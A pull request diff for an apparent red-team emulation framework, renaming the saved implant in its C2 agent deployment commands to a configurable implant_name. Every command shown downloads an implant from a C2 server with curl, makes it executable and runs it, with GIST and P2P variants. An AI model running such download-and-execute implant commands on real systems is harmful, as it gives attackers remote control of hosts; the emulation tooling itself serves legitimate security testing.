### PR TITLE
Changing deployment commands to use implant_name variable instead of static names

### DIFF
--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -12,9 +12,9 @@
       sh:
         command: |
           server="#{app.contact.http}";
-          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download > sandcat.go;
-          chmod +x sandcat.go;
-          ./sandcat.go -server $server -v
+          curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" $server/file/download > #{agents.implant_name};
+          chmod +x #{agents.implant_name};
+          ./#{agents.implant_name} -server $server -v
         variations:
           - description: Deploy as a blue-team agent instead of red
             command: |
@@ -29,22 +29,22 @@
           - description: Download with GIST C2
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > sandcat.go;
-              chmod +x sandcat.go;
-              ./sandcat.go -c2 GIST -v
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -c2 GIST -v
           - description: Deploy as a P2P agent with known peers included in compiled agent
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > sandcat.go;
-              chmod +x sandcat.go;
-              ./sandcat.go -server $server -listenP2P -v
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -listenP2P -v
     linux:
       sh:
         command: |
           server="#{app.contact.http}";
-          curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;
-          chmod +x sandcat.go;
-          ./sandcat.go -server $server -group red -v
+          curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > #{agents.implant_name};
+          chmod +x #{agents.implant_name};
+          ./#{agents.implant_name} -server $server -group red -v
         variations:
           - description: Deploy as a blue-team agent instead of red
             command: |
@@ -59,15 +59,15 @@
           - description: Download with GIST C2
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > sandcat.go;
-              chmod +x sandcat.go;
-              ./sandcat.go -c2 GIST -v
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -c2 GIST -v
           - description: Deploy as a P2P agent with known peers included in compiled agent
             command: |
               server="#{app.contact.http}";
-              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > sandcat.go;
-              chmod +x sandcat.go;
-              ./sandcat.go -server $server -listenP2P -v
+              curl -s -X POST -H "file:sandcat.go" -H "platform:darwin" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -listenP2P -v
     windows:
       psh:
         command: |


### PR DESCRIPTION
## Description

changing deployment commands to use the agent.implant_name configuration item instead of sandcat.go

## Type of change

Please delete options that are not relevant.

- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Started up server with the required change and made sure the deployment commands in the UI had the agent name properly populated with the implant_name, and that it was user configurable from the deployment command page

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [NA] I have made corresponding changes to the documentation
- [NA] I have added tests that prove my fix is effective or that my feature works
